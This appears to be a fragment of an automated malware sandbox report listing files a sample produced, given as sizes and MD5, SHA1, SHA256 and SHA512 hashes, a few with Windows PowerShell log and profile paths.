SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
944B
MD5cadef9abd087803c630df65264a6c81c
SHA1babbf3636c347c8727c35f3eef2ee643dbcc4bd2
SHA256cce65b73cdfe9304bcd5207913e8b60fb69faa20cd3b684f2b0343b755b99438
SHA5127278aa87124abb382d9024a645e881e7b7cf1b84e8894943b36e018dbf0399e6858392f77980b599fa5488e2e21bf757a0702fe6419417edac93b68e0c2ec085
-
Filesize
8KB
MD5b2b629186c5177f619378848dfe9c7f2
SHA11c96393b43fdb82f8a6655b3711ac32f4b330e27
SHA256aaf7db084f8ce612e8c8f808d1b26e1c3c07db599522d54079998fa9aac4a584
SHA512264d7b090d58483282c9891b0048aea038ad29b1d079761483075319152f9323aef2e10f877fc8418c54307628e721865e73524a54e57a20f340d95b4d2f4afd
-
Filesize
8KB
MD525a2ad3c64e0d956603778cdb7a3d01b
SHA1886cc2ff6b811a3bcd7e35ad0b89087a52025375
SHA2567efd93bcf12bbdc613f305a5772544b280ccdc07a1f7cb2b2cd919a91537d3e1
SHA512ff249d0734afe4b43a7507e203605e21428fd4c441614d57454b953857f6dbff4d532a1581d068eb0f99382a748dc85c41a4ec50788ba168bd1d6e0270d7261b
-
Filesize
512KB
MD52dc7c15cdaf642f9e6b26fea3820db1c
SHA1cf116c5b98c7acbcf3b1cca42ee0d96e305f3836
SHA25649f19925467819687cf04a81188ff7864ea476fc661d44c316bf38a52c65c1bd
SHA5125d201b8b9c0119fad200022a4c178a6fae5cc6c5d7e0cee0090160883e88d737bf9b3a9685b3ba0a790df1e5be0aa7381f9739946732703c25376dadf8e0696a
-
Filesize
512KB
MD52dc7c15cdaf642f9e6b26fea3820db1c
SHA1cf116c5b98c7acbcf3b1cca42ee0d96e305f3836
SHA25649f19925467819687cf04a81188ff7864ea476fc661d44c316bf38a52c65c1bd
SHA5125d201b8b9c0119fad200022a4c178a6fae5cc6c5d7e0cee0090160883e88d737bf9b3a9685b3ba0a790df1e5be0aa7381f9739946732703c25376dadf8e0696a
-
Filesize
14.0MB
MD54a522b4d22657f11163f0fcedf024c6d
SHA1a437a2c810be90992276deb31ed02b8c82d0b15c
SHA256c5e901f66e48e18a283a94c9253d35e276513194db3d2d289dc929b254378936
SHA512aaf4bb64bd088be8439e6d40f69b1573b5c60b3998d2a5b118ccee12f1ddec9efc3cc3add256d41d5ddd989907f528d23a6791da5ed17b2ccfe19d303ab8cbe4
-
Filesize
14.0MB
MD54a522b4d22657f11163f0fcedf024c6d
SHA1a437a2c810be90992276deb31ed02b8c82d0b15c
SHA256c5e901f66e48e18a283a94c9253d35e276513194db3d2d289dc929b254378936
SHA512aaf4bb64bd088be8439e6d40f69b1573b5c60b3998d2a5b118ccee12f1ddec9efc3cc3add256d41d5ddd989907f528d23a6791da5ed17b2ccfe19d303ab8cbe4
-
Filesize
16KB
MD5603bb73a3283a85271e41318a3ea77dc
SHA12168503e317070defc5858a74cb6162a45add57e
SHA256e404bc748bdbbf5ba3731066b1aed41732ca2f3c3b946cc31665674ed1d61c93
SHA512733a31dfa14012d65b58db3dca917453dc59dae970d4b93be9d5ce4050d3167bc6944c81c14f85a77a6e429c57ced9952bd10e20bba19d04e0b2865843205354
-
Filesize
16KB
MD5413191f15fca983f439f87f41706f5c5
SHA18e237dad87e5f4bd9a935ff17635fb4f71cb7e94
SHA2567ff3ae4ac6a2a6e84be988c3aa71fcaf89803c3b8c2e4f053ffbd207e684e2da
SHA51200171cea0b4f7e2e635ec1527b405470f6436fbde14341fa721b44c5ca28aaf64bafd296ab0730624fe531ecd22103c6d9fef106098849d76ecf91dab074dddc
-
Filesize
5.1MB
MD52438b851e157a3f70bd48af1984b2139
SHA1105ce31ecdce604bf8629ddc6580f2ad25fc21b5
SHA256bada6d6d493416c0992a375de60fe574ced09bef5496ebfac07c19a8b2785494
SHA512ff1ba2eee03a981744434984d431f022afee988745a54d268c39df258502ba57d9880c916050370e351a709ab42928c0a7c3665a7b80b384e9832841e3d76c52
-
Filesize
5.1MB
MD52438b851e157a3f70bd48af1984b2139
SHA1105ce31ecdce604bf8629ddc6580f2ad25fc21b5
SHA256bada6d6d493416c0992a375de60fe574ced09bef5496ebfac07c19a8b2785494
SHA512ff1ba2eee03a981744434984d431f022afee988745a54d268c39df258502ba57d9880c916050370e351a709ab42928c0a7c3665a7b80b384e9832841e3d76c52
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize3KB
MD5556084f2c6d459c116a69d6fedcc4105
SHA1633e89b9a1e77942d822d14de6708430a3944dbc
SHA25688cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8
SHA5120f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize1KB
MD58e7a623fcc311b5017c82b1181911569
SHA1048d36afc6481760c53cff348c05744d98f3cce7
SHA2569d5367afff64011b621c73c310c4b8bda206ec02726aadc0b17572d90888b25d
SHA5123848945ad50086a6af42f9640bcebf3fecac3d8a6f2012eeb786a2def1a68f94848350bfec9115687b98f4e0bba643e807fbf1efd715d676e0d634f158e5d231
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize1KB
MD520529297778890e4f2947a985a6441a9
SHA11f1b79d148e4b9f7df376211c0da9657b724b0fe
SHA256420c6ef17d53b54048806fb323150923c5e3897969251d7165d698370a4a6e43
SHA5123dfcd80c51f1e5372077ac33c3e9798a6ee85c766edfea9eb701ca9d679cc8b2fe0e77f68d4ff81ab992437a6b8d4c9b7bc3280fca62c5626819f52f516e8a61
-
Filesize
3KB
MD5e546b81f1a1a1b753a4f6d3455394dec
SHA114f407db119dd97ed248be2a8d15a09ba938987a
SHA2561100d55448340b1a23c243209beb3aa1035a45912c346c00afb41181d9798de8
SHA51203f12755ae8c165323b2562b620731217b9f55affe782e6e07540131065b2edf5c465b5440d6b08c7a1a3d8541e423e8c9919ca768f72f830bc211bceb7fccfe